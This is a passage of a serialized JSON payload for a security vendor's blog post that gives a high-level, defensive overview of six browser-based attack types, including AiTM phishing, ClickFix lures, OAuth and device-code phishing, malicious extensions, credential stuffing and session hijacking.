118.6L192 301.3 192 416c0 8.5 3.4 16.6 9.4 22.6l64 64c9.2 9.2 22.9 11.9 34.9 6.9S320 492.9 320 480l0-178.7 182.6-182.6c9.2-9.2 11.9-22.9 6.9-34.9S492.9 64 480 64L32 64z",{"w":830,"h":815,"d":858},"M144 480c-79.5 0-144-64.5-144-144 0-63.4 41-117.2 97.9-136.5-1.3-7.7-1.9-15.5-1.9-23.5 0-79.5 64.5-144 144-144 55.4 0 103.5 31.3 127.6 77.1 14.2-8.3 30.8-13.1 48.4-13.1 53 0 96 43 96 96 0 15.7-3.8 30.6-10.5 43.7 44 20.3 74.5 64.7 74.5 116.3 0 70.7-57.3 128-128 128l-304 0zM305 191c-9.4-9.4-24.6-9.4-33.9 0l-72 72c-9.4 9.4-9.4 24.6 0 33.9s24.6 9.4 33.9 0l31-31 0 102.1c0 13.3 10.7 24 24 24s24-10.7 24-24l0-102.1 31 31c9.4 9.4 24.6 9.4 33.9 0s9.4-24.6 0-33.9l-72-72z",[860,4874,8051,12695,18078,21247,25358,27024,28335,31538,34029,36189,38128,41310],{"id":861,"title":862,"authorsCollection":863,"content":873,"extension":228,"faqItemsCollection":1958,"faqTitle":59,"featured":6,"hashTags":59,"meta":1960,"metaTitle":1961,"ogImage":59,"postType":1962,"publishedDate":1963,"relatedBlogPostsCollection":1964,"slug":4802,"stem":4803,"subtitle":59,"summary":4804,"synopsis":4815,"sys":4816,"tagsCollection":4819,"topicsCollection":4825,"__hash__":4873},"blog\u002Fblog\u002F6-browser-based-attacks-every-security-team-should-be-prepared-for.json","6 browser-based attacks every security team should be prepared for",{"items":864},[865],{"fullName":866,"firstName":867,"jobTitle":868,"socialLinks":869,"profilePicture":871},"Dan Green","Dan","Threat Research",[870],"https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fdaniel-g-\u002F",{"url":872},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F7jik1VhFgA3kgzXBXTm2Vw\u002Ffcd8c171da644903d0827eafcfbcaad0\u002FDan_Headshot_2025.png",{"json":874,"links":1758},{"nodeType":875,"data":876,"content":877},"document",{},[878,897,904,908,918,925,932,970,979,986,993,1000,1007,1010,1018,1025,1032,1035,1044,1050,1057,1064,1070,1090,1097,1104,1111,1117,1120,1128,1135,1166,1173,1189,1208,1219,1225,1228,1236,1255,1262,1285,1317,1353,1360,1366,1369,1377,1396,1403,1431,1462,1468,1471,1479,1506,1523,1530,1580,1599,1606,1613,1619,1622,1630,1637,1644,1670,1689,1695,1698,1706,1725,1732,1739],{"nodeType":879,"data":880,"content":881},"paragraph",{},[882,887,893],{"nodeType":883,"value":884,"marks":885,"data":886},"text","The view that \"the browser is the new endpoint\" and \"the new battleground for cyber attacks\" is becoming increasingly advocated by security leaders. But what does this ",[],{},{"nodeType":883,"value":888,"marks":889,"data":892},"actually",[890],{"type":891},"italic",{},{"nodeType":883,"value":894,"marks":895,"data":896}," mean for security teams? ",[],{},{"nodeType":879,"data":898,"content":899},{},[900],{"nodeType":883,"value":901,"marks":902,"data":903},"In this article, we’re cutting out the jargon to explore what a browser-based attack is, and what’s required for effective detection and response. ",[],{},{"nodeType":905,"data":906,"content":907},"hr",{},[],{"nodeType":909,"data":910,"content":911},"heading-1",{},[912],{"nodeType":883,"value":913,"marks":914,"data":917},"What is the goal of a browser-based attack?   ",[915],{"type":916},"bold",{},{"nodeType":879,"data":919,"content":920},{},[921],{"nodeType":883,"value":922,"marks":923,"data":924},"First, it’s important to establish what the point of a browser-based attack is.",[],{},{"nodeType":879,"data":926,"content":927},{},[928],{"nodeType":883,"value":929,"marks":930,"data":931},"In most scenarios, attackers don’t think of themselves as attacking your web browser. Their end-goal is to compromise your business apps and data. That means going after the third-party apps and services that are now the backbone of business IT — and therefore the top target for attackers. ",[],{},{"nodeType":879,"data":933,"content":934},{},[935,939,950,954,958,966],{"nodeType":883,"value":936,"marks":937,"data":938},"The most common attack path today sees attackers log into third-party services, dump the data, and monetize it through extortion. You need only look at last year’s ",[],{},{"nodeType":940,"data":941,"content":943},"hyperlink",{"uri":942},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fsnowflake-retro",[944],{"nodeType":883,"value":945,"marks":946,"data":949},"Snowflake",[947],{"type":948},"underline",{},{"nodeType":883,"value":951,"marks":952,"data":953}," ",[],{},{"nodeType":883,"value":955,"marks":956,"data":957},"customer breaches that impacted 165+ organizations, or the still-ongoing ",[],{},{"nodeType":940,"data":959,"content":961},{"uri":960},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fanalyzing-the-instructure-breach",[962],{"nodeType":883,"value":963,"marks":964,"data":965},"Salesforce attacks",[],{},{"nodeType":883,"value":967,"marks":968,"data":969}," to see the scale of the problem. Identity weaknesses played a material role in almost 90% of Unit 42's investigations, and Google\u002FMandiant reported that identity issues were the initial access vector in 83% of cloud-related incidents.",[],{},{"nodeType":971,"data":972,"content":978},"embedded-entry-block",{"target":973},{"sys":974},{"id":975,"type":976,"linkType":977},"5agrVXzEdwALmew2F5SPDp","Link","Entry",[],{"nodeType":879,"data":980,"content":981},{},[982],{"nodeType":883,"value":983,"marks":984,"data":985},"The most logical way to do this is by targeting users of those apps. And because of the changes to working practices, your users are more accessible than ever to external attackers.",[],{},{"nodeType":879,"data":987,"content":988},{},[989],{"nodeType":883,"value":990,"marks":991,"data":992},"Once upon a time, email was the primary communication channel with the wider world, and work happened locally — on your device, and inside your locked-down network environment. This made email and the endpoint the highest priority from a security perspective. But now, with modern work happening across a network of decentralized internet apps, and more varied communication channels outside of email, it’s harder to stop users from interacting with malicious content (at least, without significantly impeding their ability to do their jobs).",[],{},{"nodeType":879,"data":994,"content":995},{},[996],{"nodeType":883,"value":997,"marks":998,"data":999},"Given that the browser is the place where business apps are accessed and used, it makes sense that attacks are increasingly playing out there too. ",[],{},{"nodeType":879,"data":1001,"content":1002},{},[1003],{"nodeType":883,"value":1004,"marks":1005,"data":1006},"With that covered off, let’s take a closer look at the most prevalent browser-based attack techniques being used by attackers in the wild today.",[],{},{"nodeType":905,"data":1008,"content":1009},{},[],{"nodeType":909,"data":1011,"content":1012},{},[1013],{"nodeType":883,"value":1014,"marks":1015,"data":1017},"The 6 key browser-based attacks that security teams need to know about",[1016],{"type":916},{},{"nodeType":879,"data":1019,"content":1020},{},[1021],{"nodeType":883,"value":1022,"marks":1023,"data":1024},"Browser-based attacks have surged in volume and variety over the past two years, driven by PhaaS industrialization, new social engineering mechanics, and the shift to identity-first TTPs.",[],{},{"nodeType":879,"data":1026,"content":1027},{},[1028],{"nodeType":883,"value":1029,"marks":1030,"data":1031},"Here's our breakdown of the top 6 browser-based attacks that should be on every security team's radar right now. Check out the videos for 101 explainers!",[],{},{"nodeType":905,"data":1033,"content":1034},{},[],{"nodeType":1036,"data":1037,"content":1038},"heading-2",{},[1039],{"nodeType":883,"value":1040,"marks":1041,"data":1043},"1. Phishing for credentials and sessions",[1042],{"type":916},{},{"nodeType":971,"data":1045,"content":1049},{"target":1046},{"sys":1047},{"id":1048,"type":976,"linkType":977},"6wn81JTcqktmJSSFfTzNSc",[],{"nodeType":879,"data":1051,"content":1052},{},[1053],{"nodeType":883,"value":1054,"marks":1055,"data":1056},"The most direct way for an attacker to compromise a business application is to phish a user of that app. You might not necessarily think of phishing as a browser-based attack, but that’s exactly what it is today. ",[],{},{"nodeType":879,"data":1058,"content":1059},{},[1060],{"nodeType":883,"value":1061,"marks":1062,"data":1063},"Phishing tooling and infrastructure has evolved a lot in the past decade, while the changes to business IT means there are both many more vectors for phishing attack delivery, and apps and identities to target. Attackers can deliver links over instant messenger apps, social media, SMS, malicious ads, and using in-app messenger functionality, as well as sending emails directly from SaaS services to bypass email-based checks. Likewise, there are now hundreds of apps per enterprise to target, with varying levels of account security configuration. ",[],{},{"nodeType":971,"data":1065,"content":1069},{"target":1066},{"sys":1067},{"id":1068,"type":976,"linkType":977},"3SrKOgpedLMQRpKIZqUQur",[],{"nodeType":879,"data":1071,"content":1072},{},[1073,1077,1086],{"nodeType":883,"value":1074,"marks":1075,"data":1076},"Whereas phishing was once entirely focused on credential theft, modern phishing attacks see the attacker intercept the victim’s session on the target app, using reverse-proxy Attacker-in-the-Middle kits that are the standard choice for attackers today. This means most forms of MFA can be bypassed, with the exception of passkeys (though attackers are finding ways to work around passkeys using ",[],{},{"nodeType":940,"data":1078,"content":1080},{"uri":1079},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fmfa-downgrade-attacks\u002F?utm_source=bleeping-computer&utm_medium=sponsored-content&utm_term=article",[1081],{"nodeType":883,"value":1082,"marks":1083,"data":1085},"downgrade attacks",[1084],{"type":948},{},{"nodeType":883,"value":1087,"marks":1088,"data":1089},"). ",[],{},{"nodeType":879,"data":1091,"content":1092},{},[1093],{"nodeType":883,"value":1094,"marks":1095,"data":1096},"There are other key differences to be aware of too. Today, phishing operates on an industrial scale, using an array of obfuscation and detection evasion techniques. The latest generation of fully customized AitM phishing kits are dynamically obfuscating the code that loads the web page, implementing custom bot protection (e.g. CAPTCHA or Cloudflare Turnstile), using runtime anti-analysis features, and using legitimate SaaS and cloud services to host and deliver phishing links to cover their tracks.",[],{},{"nodeType":879,"data":1098,"content":1099},{},[1100],{"nodeType":883,"value":1101,"marks":1102,"data":1103},"This means that traditional anti-phishing tools at the email and network layer are struggling to keep up, with many attacks evading email-based detections (or bypassing email altogether). At the same time, proxy-based solutions now see a garbled mess of JavaScript code without the necessary context of what is actually happening in the browser to be able to piece it together effectively. Even if they don’t realize it, this means many organizations are now relying solely on blocking known-bad sites and hosts — a wildly ineffective solution with the rate that attackers refresh and rotate their phishing infrastructure. ",[],{},{"nodeType":879,"data":1105,"content":1106},{},[1107],{"nodeType":883,"value":1108,"marks":1109,"data":1110},"These changes make phishing more effective than ever, and increasingly difficult to detect and block without being able to observe and analyze web pages that a user interacts with in real time — something only possible with browser-level visibility. ",[],{},{"nodeType":971,"data":1112,"content":1116},{"target":1113},{"sys":1114},{"id":1115,"type":976,"linkType":977},"NHu0Q6ac9mLOPPMoswB8B",[],{"nodeType":905,"data":1118,"content":1119},{},[],{"nodeType":1036,"data":1121,"content":1122},{},[1123],{"nodeType":883,"value":1124,"marks":1125,"data":1127},"2. Malicious copy and paste (aka. ClickFix, FileFix, etc.)",[1126],{"type":916},{},{"nodeType":879,"data":1129,"content":1130},{},[1131],{"nodeType":883,"value":1132,"marks":1133,"data":1134},"Since late 2024, attackers have been tricking users into performing malicious actions under the pretext of \"fixing\" an issue for a webpage to load. The most common scenarios relate to \"verifying that you are human,\" styled as a version of the bot protection challenges we're all used to encountering on the internet today. ",[],{},{"nodeType":879,"data":1136,"content":1137},{},[1138,1142,1150,1154,1162],{"nodeType":883,"value":1139,"marks":1140,"data":1141},"Microsoft's Digital Defense Report identified ClickFix as the ",[],{},{"nodeType":940,"data":1143,"content":1145},{"uri":1144},"https:\u002F\u002Fcdn-dynmedia-1.microsoft.com\u002Fis\u002Fcontent\u002Fmicrosoftcorp\u002Fmicrosoft\u002Fmsc\u002Fdocuments\u002Fpresentations\u002FCSR\u002FMicrosoft-Digital-Defense-Report-2025.pdf",[1146],{"nodeType":883,"value":1147,"marks":1148,"data":1149},"most common initial access vector, accounting for 47% of observed attacks",[],{},{"nodeType":883,"value":1151,"marks":1152,"data":1153},". CrowdStrike recorded a ",[],{},{"nodeType":940,"data":1155,"content":1157},{"uri":1156},"https:\u002F\u002Fwww.crowdstrike.com\u002Fexplore\u002F2026-global-threat-report",[1158],{"nodeType":883,"value":1159,"marks":1160,"data":1161},"563% increase in fake CAPTCHA ClickFix lures",[],{},{"nodeType":883,"value":1163,"marks":1164,"data":1165},". Push's own detection data tells a similar story: ClickFix made up an average of 52% of detections through Q2 2026, surpassing all other browser-based attack categories for the first time.",[],{},{"nodeType":879,"data":1167,"content":1168},{},[1169],{"nodeType":883,"value":1170,"marks":1171,"data":1172},"Traditional ClickFix-style attacks are a hybrid of browser and endpoint targeting. While delivered via the browser, the user copies and runs malicious scripts on their endpoint, targeting a wide range of legitimate, pre-installed system tools that allow commands to be run (Living Off the Land Binaries, or LOLBins). This results in the user installing malicious software on their machine — typically Remote Access Tools (RATs) and infostealer malware.",[],{},{"nodeType":879,"data":1174,"content":1175},{},[1176,1180,1185],{"nodeType":883,"value":1177,"marks":1178,"data":1179},"Notably, ClickFix remains a trap that users fall into rather than something they're targeted with directly. ",[],{},{"nodeType":883,"value":1181,"marks":1182,"data":1184},"4 in 5 ClickFix payloads intercepted by Push are accessed from search engines",[1183],{"type":916},{},{"nodeType":883,"value":1186,"marks":1187,"data":1188}," — the result of compromised sites, malvertising, and SEO poisoning. This naturally means they completely bypass email-based security controls. ",[],{},{"nodeType":879,"data":1190,"content":1191},{},[1192,1196,1204],{"nodeType":883,"value":1193,"marks":1194,"data":1195},"ClickFix continues to spawn new tools and sub-techniques. ClickFix-as-a-Service platforms are achieving 60% victim conversion rates. Payloads are highly variable, with Push capturing 84 distinct command forms targeting 16+ different system binaries. EtherHiding — storing kit configuration on public blockchains — means there's no host to take down and no domain to block. Attackers are also using shared conversations on AI chatbot platforms like ",[],{},{"nodeType":940,"data":1197,"content":1199},{"uri":1198},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fllmshare-malvertising-campaign\u002F",[1200],{"nodeType":883,"value":1201,"marks":1202,"data":1203},"ChatGPT and Claude to deliver malware",[],{},{"nodeType":883,"value":1205,"marks":1206,"data":1207}," via pages hosted on trusted, legitimate domains.",[],{},{"nodeType":879,"data":1209,"content":1210},{},[1211,1215],{"nodeType":883,"value":1212,"marks":1213,"data":1214},"These varied delivery mechanisms and payloads make ClickFix tricky for traditional security tools to detect in real time. However,",[],{},{"nodeType":883,"value":1216,"marks":1217,"data":1218}," every ClickFix attack and variant happens in the browser with a malicious copy and paste event, which is where browser-based tools like Push have a great opportunity to intercept them.",[],{},{"nodeType":971,"data":1220,"content":1224},{"target":1221},{"sys":1222},{"id":1223,"type":976,"linkType":977},"29Y7nRr39TiUyvAwinYctG",[],{"nodeType":905,"data":1226,"content":1227},{},[],{"nodeType":1036,"data":1229,"content":1230},{},[1231],{"nodeType":883,"value":1232,"marks":1233,"data":1235},"3. Authorization phishing",[1234],{"type":916},{},{"nodeType":879,"data":1237,"content":1238},{},[1239,1243,1251],{"nodeType":883,"value":1240,"marks":1241,"data":1242},"While AiTM phishing targets the login — the moment a user proves their identity — a growing class of attacks targets what happens after the login. Instead of stealing a session from the authentication flow, ",[],{},{"nodeType":940,"data":1244,"content":1246},{"uri":1245},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fauthorization-phishing",[1247],{"nodeType":883,"value":1248,"marks":1249,"data":1250},"authorization phishing",[],{},{"nodeType":883,"value":1252,"marks":1253,"data":1254}," abuses OAuth authorization mechanisms — consent grants, device code flows, and token exchanges — to obtain access tokens. The attacker never touches the authentication flow at all, which means every form of MFA, including phishing-resistant passkeys, is irrelevant.",[],{},{"nodeType":879,"data":1256,"content":1257},{},[1258],{"nodeType":883,"value":1259,"marks":1260,"data":1261},"Three techniques currently fall under the authorization phishing umbrella:",[],{},{"nodeType":879,"data":1263,"content":1264},{},[1265,1269,1273,1281],{"nodeType":883,"value":703,"marks":1266,"data":1268},[1267],{"type":916},{},{"nodeType":883,"value":1270,"marks":1271,"data":1272}," sees the victim authorize a third-party app via an OAuth consent grant. This can be an app the attacker has created, or a legitimate SaaS app tenant — you can simply sign up for an account and ",[],{},{"nodeType":940,"data":1274,"content":1276},{"uri":1275},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fopenai-poisoned-tenant-attack",[1277],{"nodeType":883,"value":1278,"marks":1279,"data":1280},"invite targets to your app tenant",[],{},{"nodeType":883,"value":1282,"marks":1283,"data":1284},". Identity providers have substantially hardened their defaults against consent phishing (Microsoft now blocks unverified third-party app consent by default, for example), which is why attackers have increasingly shifted to the next two techniques.",[],{},{"nodeType":879,"data":1286,"content":1287},{},[1288,1292,1296,1304,1308,1313],{"nodeType":883,"value":361,"marks":1289,"data":1291},[1290],{"type":916},{},{"nodeType":883,"value":1293,"marks":1294,"data":1295}," targets a different OAuth flow entirely: the RFC 8628 device authorization grant, originally designed for input-constrained devices like smart TVs. The attacker generates a code, delivers it to the victim via a phishing page, and the victim enters the code on the real identity provider's device login page. Push has tracked a ",[],{},{"nodeType":940,"data":1297,"content":1299},{"uri":1298},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fdevice-code-phishing",[1300],{"nodeType":883,"value":1301,"marks":1302,"data":1303},"37.5x increase in device code phishing attacks",[],{},{"nodeType":883,"value":1305,"marks":1306,"data":1307}," in 2026, with ",[],{},{"nodeType":883,"value":1309,"marks":1310,"data":1312},"30+ distinct kits",[1311],{"type":916},{},{"nodeType":883,"value":1314,"marks":1315,"data":1316}," now offering the technique. Because device code phishing targets apps already consented in the user's tenant (usually first-party Microsoft apps), it sidesteps the consent restrictions that shut down traditional consent phishing.",[],{},{"nodeType":879,"data":1318,"content":1319},{},[1320,1325,1329,1337,1341,1349],{"nodeType":883,"value":1321,"marks":1322,"data":1324},"ConsentFix",[1323],{"type":916},{},{"nodeType":883,"value":1326,"marks":1327,"data":1328}," occupies a middle ground — a ClickFix-OAuth hybrid that targets the standard authorization code grant flow rather than the device code flow. ",[],{},{"nodeType":940,"data":1330,"content":1332},{"uri":1331},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fconsentfix\u002F",[1333],{"nodeType":883,"value":1334,"marks":1335,"data":1336},"First observed in Russian APT29 campaigns",[],{},{"nodeType":883,"value":1338,"marks":1339,"data":1340},", it has since been ",[],{},{"nodeType":940,"data":1342,"content":1344},{"uri":1343},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fconsentfix-v3-analyzing-a-new-toolkit\u002F",[1345],{"nodeType":883,"value":1346,"marks":1347,"data":1348},"commoditized into criminal tooling",[],{},{"nodeType":883,"value":1350,"marks":1351,"data":1352},".",[],{},{"nodeType":879,"data":1354,"content":1355},{},[1356],{"nodeType":883,"value":1357,"marks":1358,"data":1359},"Preventing malicious OAuth grants requires tight in-app management of user permissions and tenant security settings across every app in the estate. Conditional access policies help, but their effectiveness varies significantly by technique — \"require compliant device\" blocks device code phishing but not ConsentFix, while \"block device code flow\" breaks legitimate use cases like Azure CLI and conference room hardware. Browser-based security tools are well positioned to observe OAuth grants across all apps accessed in the browser — even the ones the security team doesn't manage or know about.",[],{},{"nodeType":971,"data":1361,"content":1365},{"target":1362},{"sys":1363},{"id":1364,"type":976,"linkType":977},"1Fxgll8d4vVwtkGdwIAgkm",[],{"nodeType":905,"data":1367,"content":1368},{},[],{"nodeType":1036,"data":1370,"content":1371},{},[1372],{"nodeType":883,"value":1373,"marks":1374,"data":1376},"4. Malicious browser extensions",[1375],{"type":916},{},{"nodeType":879,"data":1378,"content":1379},{},[1380,1384,1392],{"nodeType":883,"value":1381,"marks":1382,"data":1383},"Attackers use malicious extensions to steal data, log keystrokes, and intercept credentials and tokens as they transit the browser. Most malicious extensions didn't start that way — attackers begin with a legitimate extension and bide their time, waiting until install counts reach maximum impact before deploying a malicious update. It's ",[],{},{"nodeType":940,"data":1385,"content":1387},{"uri":1386},"https:\u002F\u002Fsecureannex.com\u002Fblog\u002Fbuying-browser-extensions\u002F",[1388],{"nodeType":883,"value":1389,"marks":1390,"data":1391},"very easy for attackers to buy and add malicious updates",[],{},{"nodeType":883,"value":1393,"marks":1394,"data":1395}," to existing extensions, easily passing extension web store security checks.",[],{},{"nodeType":879,"data":1397,"content":1398},{},[1399],{"nodeType":883,"value":1400,"marks":1401,"data":1402},"There are four common entry paths: phish the developer of a popular extension; offer to buy a widely-installed extension outright; vibe-code your own extension and market it to users; or upload a malicious version and let user browsers auto-update on next launch.",[],{},{"nodeType":879,"data":1404,"content":1405},{},[1406,1410,1415,1419,1427],{"nodeType":883,"value":1407,"marks":1408,"data":1409},"Permissions alone don't indicate risk, since nearly every extension has exploitable ones — ",[],{},{"nodeType":883,"value":1411,"marks":1412,"data":1414},"46.76% of extensions across Push customers have the permission combinations needed for account takeover with no user interaction",[1413],{"type":916},{},{"nodeType":883,"value":1416,"marks":1417,"data":1418},". The most dangerous let attackers intercept sensitive data, credentials, and session tokens in transit. Malicious extensions routinely evade static and sandbox analysis via dynamically compiled, smuggled code, letting them reach official stores and even earn \"Featured\" or \"Verified\" status. AI browser extensions add a further dimension: the ",[],{},{"nodeType":940,"data":1420,"content":1422},{"uri":1421},"https:\u002F\u002Fwww.verizon.com\u002Fbusiness\u002Fresources\u002Freports\u002Fdbir\u002F",[1423],{"nodeType":883,"value":1424,"marks":1425,"data":1426},"Verizon DBIR 2026",[],{},{"nodeType":883,"value":1428,"marks":1429,"data":1430}," found that more than 15% of corporate users had unauthorized AI browser extensions installed — extensions that collect and retain browsing context from internal sites, creating a data exfiltration pathway that operates independently of traditional DLP controls.",[],{},{"nodeType":879,"data":1432,"content":1433},{},[1434,1438,1446,1450,1458],{"nodeType":883,"value":1435,"marks":1436,"data":1437},"Generally, your employees should not be randomly installing browser extensions unless pre-approved by your security team. But the reality is that many organizations have very little visibility of the extensions their employees are using, and the potential risk they're exposed to as a result. Static risk scoring is a ",[],{},{"nodeType":940,"data":1439,"content":1441},{"uri":1440},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fwhy-browser-extension-risk-scoring-wont-predict-your-next-breach\u002F",[1442],{"nodeType":883,"value":1443,"marks":1444,"data":1445},"poor predictor of supply chain compromise",[],{},{"nodeType":883,"value":1447,"marks":1448,"data":1449}," — every major breach of the past 18 months involved extensions that scored as low-risk beforehand. A default-deny approach with ",[],{},{"nodeType":940,"data":1451,"content":1453},{"uri":1452},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fbrowser-extension-management-guide\u002F",[1454],{"nodeType":883,"value":1455,"marks":1456,"data":1457},"allowlisting plus monitoring for change events",[],{},{"nodeType":883,"value":1459,"marks":1460,"data":1461}," is more effective than risk-score-based removal.",[],{},{"nodeType":971,"data":1463,"content":1467},{"target":1464},{"sys":1465},{"id":1466,"type":976,"linkType":977},"6WRUfE4LepAQ35hRz2UlH1",[],{"nodeType":905,"data":1469,"content":1470},{},[],{"nodeType":1036,"data":1472,"content":1473},{},[1474],{"nodeType":883,"value":1475,"marks":1476,"data":1478},"5. Credential stuffing and ghost logins",[1477],{"type":916},{},{"nodeType":879,"data":1480,"content":1481},{},[1482,1486,1494,1498,1503],{"nodeType":883,"value":1483,"marks":1484,"data":1485},"Password-based compromise remains one of the leading causes of breaches. It's arguably worse than ever in sprawling SaaS environments: users log into tens (sometimes hundreds) of apps, and billions of stolen credentials circulate on the internet, fueled by infostealer infections and data breaches. ",[],{},{"nodeType":940,"data":1487,"content":1489},{"uri":1488},"https:\u002F\u002Fcf-assets.www.cloudflare.com\u002Fslt3lc6tev37\u002FsWDBUMNVtEJB9ZFLt1dUU\u002F8d69e92de2edfb3bf59e7d21d57e7e1a\u002FCloudflare-2026-threat-report.pdf",[1490],{"nodeType":883,"value":1491,"marks":1492,"data":1493},"Cloudflare's 2026 Threat Report",[],{},{"nodeType":883,"value":1495,"marks":1496,"data":1497}," found that ",[],{},{"nodeType":883,"value":1499,"marks":1500,"data":1502},"63% of all human logins involve credentials already compromised elsewhere",[1501],{"type":916},{},{"nodeType":883,"value":1350,"marks":1504,"data":1505},[],{},{"nodeType":879,"data":1507,"content":1508},{},[1509,1513,1519],{"nodeType":883,"value":1510,"marks":1511,"data":1512},"The infostealer pipeline feeding this ecosystem is significant. The ",[],{},{"nodeType":940,"data":1514,"content":1515},{"uri":1421},[1516],{"nodeType":883,"value":1424,"marks":1517,"data":1518},[],{},{"nodeType":883,"value":1520,"marks":1521,"data":1522}," found that 50% of ransomware victims had a credential or infostealer event within 95 days prior to the attack, with infostealers surfacing an average of 2,362 breached corporate credentials per month from organizational email domains.",[],{},{"nodeType":879,"data":1524,"content":1525},{},[1526],{"nodeType":883,"value":1527,"marks":1528,"data":1529},"\"But our users log in via SSO and those accounts are MFA-protected, right?\" The reality might surprise you. Of the last million logins observed by Push:",[],{},{"nodeType":1531,"data":1532,"content":1533},"unordered-list",{},[1534,1550,1565],{"nodeType":1535,"data":1536,"content":1537},"list-item",{},[1538],{"nodeType":879,"data":1539,"content":1540},{},[1541,1546],{"nodeType":883,"value":1542,"marks":1543,"data":1545},"1 in 4",[1544],{"type":916},{},{"nodeType":883,"value":1547,"marks":1548,"data":1549}," were password logins, not SSO",[],{},{"nodeType":1535,"data":1551,"content":1552},{},[1553],{"nodeType":879,"data":1554,"content":1555},{},[1556,1561],{"nodeType":883,"value":1557,"marks":1558,"data":1560},"2 in 5",[1559],{"type":916},{},{"nodeType":883,"value":1562,"marks":1563,"data":1564}," were not protected by MFA",[],{},{"nodeType":1535,"data":1566,"content":1567},{},[1568],{"nodeType":879,"data":1569,"content":1570},{},[1571,1576],{"nodeType":883,"value":1572,"marks":1573,"data":1575},"1 in 5",[1574],{"type":916},{},{"nodeType":883,"value":1577,"marks":1578,"data":1579}," used a weak, breached, or reused password",[],{},{"nodeType":879,"data":1581,"content":1582},{},[1583,1587,1595],{"nodeType":883,"value":1584,"marks":1585,"data":1586},"SSO isn't universal — SAML often costs extra, requires admin setup, and self-adopted apps rarely get configured, while most apps allow simultaneous login methods and don't restrict login methods. The result is ",[],{},{"nodeType":940,"data":1588,"content":1590},{"uri":1589},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fhow-many-vulnerable-identities-do-you-have\u002F",[1591],{"nodeType":883,"value":1592,"marks":1593,"data":1594},"ghost logins",[],{},{"nodeType":883,"value":1596,"marks":1597,"data":1598},": backup credentials outside SSO, invisible to IdP logs, created at adoption and still active unless disabled — gaps that stay hidden since most orgs focus MFA at the IdP layer, not on local app config, until an attacker finds them.",[],{},{"nodeType":879,"data":1600,"content":1601},{},[1602],{"nodeType":883,"value":1603,"marks":1604,"data":1605},"Logins can be observed in the browser — in fact, it's as close to a universal source of truth as you're going to get about how your employees are actually logging in, which apps they're using, and whether MFA is present, enabling security teams to find and fix vulnerable logins before they can be exploited.",[],{},{"nodeType":879,"data":1607,"content":1608},{},[1609],{"nodeType":883,"value":1610,"marks":1611,"data":1612},"Even if malicious content cannot always be flagged from surface-level inspection of a file, recording file downloads in the browser is a useful addition to endpoint-based malware protection, and provides another layer of defense against file downloads that perform client-side attacks, or redirect the user to malicious web-based content. ",[],{},{"nodeType":971,"data":1614,"content":1618},{"target":1615},{"sys":1616},{"id":1617,"type":976,"linkType":977},"1tX9gSZ51VEmXjRliTXuPV",[],{"nodeType":905,"data":1620,"content":1621},{},[],{"nodeType":1036,"data":1623,"content":1624},{},[1625],{"nodeType":883,"value":1626,"marks":1627,"data":1629},"6. Session hijacking",[1628],{"type":916},{},{"nodeType":879,"data":1631,"content":1632},{},[1633],{"nodeType":883,"value":1634,"marks":1635,"data":1636},"Session hijacking (aka token replay) allows attackers to bypass the authentication process by taking an already-approved session token that they've stolen from the victim's device or browser, and reusing it in their own browser. This enables them to get around even phishing-resistant authentication controls like passkeys.",[],{},{"nodeType":879,"data":1638,"content":1639},{},[1640],{"nodeType":883,"value":1641,"marks":1642,"data":1643},"This is different to AiTM attacks, which see a new session created via the attacker's reverse-proxy connection to the target app. Sessions can be stolen using a variety of methods, some of which we've already discussed. Malicious browser extensions can extract them from webpages visited by the user, for example. But the most prominent source of stolen tokens is infostealer malware — also the leading source of stolen credentials powering credential stuffing attacks.",[],{},{"nodeType":879,"data":1645,"content":1646},{},[1647,1651,1658,1661,1666],{"nodeType":883,"value":1648,"marks":1649,"data":1650},"As mentioned previously, ClickFix is now the go-to method for delivering malware like infostealers. ClickFix is more detection-resistant than a normal file download, which is more likely to be intercepted and analyzed by controls like a web sandbox before hitting the endpoint and more likely to trigger endpoint alarms during execution. The problem extends beyond managed corporate machines, too: the ",[],{},{"nodeType":940,"data":1652,"content":1653},{"uri":1421},[1654],{"nodeType":883,"value":1655,"marks":1656,"data":1657},"Verizon DBIR 2025",[],{},{"nodeType":883,"value":1495,"marks":1659,"data":1660},[],{},{"nodeType":883,"value":1662,"marks":1663,"data":1665},"46% of infostealer infections that lead to corporate breaches originate on non-managed devices",[1664],{"type":916},{},{"nodeType":883,"value":1667,"marks":1668,"data":1669}," — personal machines, developer workstations, and contractor laptops where EDR is absent.",[],{},{"nodeType":879,"data":1671,"content":1672},{},[1673,1677,1685],{"nodeType":883,"value":1674,"marks":1675,"data":1676},"There's also a less obvious path for session theft. ",[],{},{"nodeType":940,"data":1678,"content":1680},{"uri":1679},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fbrowser-sync-attacks-where-personal-account-hacks-lead-to-corporate-breaches\u002F",[1681],{"nodeType":883,"value":1682,"marks":1683,"data":1684},"Browser sync features",[],{},{"nodeType":883,"value":1686,"marks":1687,"data":1688}," create a bridge between personal and corporate credential stores, meaning personal account or device compromises can directly lead to corporate breaches — as demonstrated in the Okta incident below, where corporate credentials had been synced to an engineer's personal Google account via Chrome profile sync.",[],{},{"nodeType":971,"data":1690,"content":1694},{"target":1691},{"sys":1692},{"id":1693,"type":976,"linkType":977},"51WVinSAV5wN7mVny7v9QC",[],{"nodeType":905,"data":1696,"content":1697},{},[],{"nodeType":909,"data":1699,"content":1700},{},[1701],{"nodeType":883,"value":1702,"marks":1703,"data":1705},"Conclusion",[1704],{"type":916},{},{"nodeType":879,"data":1707,"content":1708},{},[1709,1713,1721],{"nodeType":883,"value":1710,"marks":1711,"data":1712},"Attacks are increasingly happening in the browser. That makes it the perfect place to detect and respond to these attacks. But right now, the browser is a blind-spot for most security teams — 